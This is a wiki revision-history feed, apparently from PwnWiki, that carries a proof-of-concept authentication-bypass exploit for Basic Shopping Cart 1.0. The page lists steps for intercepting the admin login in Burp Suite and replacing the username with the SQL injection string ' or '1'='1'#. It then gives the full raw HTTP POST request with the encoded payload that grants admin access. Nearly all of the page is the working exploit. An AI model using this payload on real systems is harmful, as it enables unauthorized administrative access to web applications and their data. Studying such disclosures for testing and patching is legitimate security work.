https://pwnwiki.com/index.php?action=history&feed=atom&title=Basic_Shopping_Cart_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E
Basic Shopping Cart 1.0 身份驗證繞過漏洞 - Revision history
2026-04-10T02:06:29Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Basic_Shopping_Cart_1.0_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=1251&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sou..."
2021-04-08T09:04:58Z
<p>Created page with "==EXP== <pre> # Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sou..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass<br />
# Date: 2021-04-03<br />
# Exploit Author: Viren Saroha (illusion)<br />
# Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html<br />
# Software Link: https://www.sourcecodester.com/download-code?nid=10964&title=Basic+Shopping+Cart+using+PHP%2FMySQL+with+Source+Code<br />
# Version: 1.0<br />
# Tested on: Windows 10/Kali Linux<br />
<br />
POC<br />
<br />
Step 1 - Go to url http://localhost/EdgeSketch/index.php and Click on Admin<br />
Step 2 – Enter anything in username and password<br />
Step 3 – Click on Login and capture the request in burpsuite<br />
Step4 – Change the username to ' or '1'='1'#<br />
Step 5 – Click forward and now you will be logged in as admin.<br />
<br />
REQUEST<br />
<br />
POST /EdgeSketch/adminlogin.php HTTP/1.1<br />
Host: localhost<br />
Content-Length: 77<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
Origin: http://localhost<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36<br />
Accept:<br />
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Referer: http://localhost/EdgeSketch/index.php<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-US,en;q=0.9<br />
Cookie: PHPSESSID=6b7072bb40c321cb336aacef057a0876<br />
Connection: close<br />
<br />
admin_username=%27+or+%271%27%3D%271%27%23&admin_password=random&admin_login=<br />
</pre></div>
Pwnwiki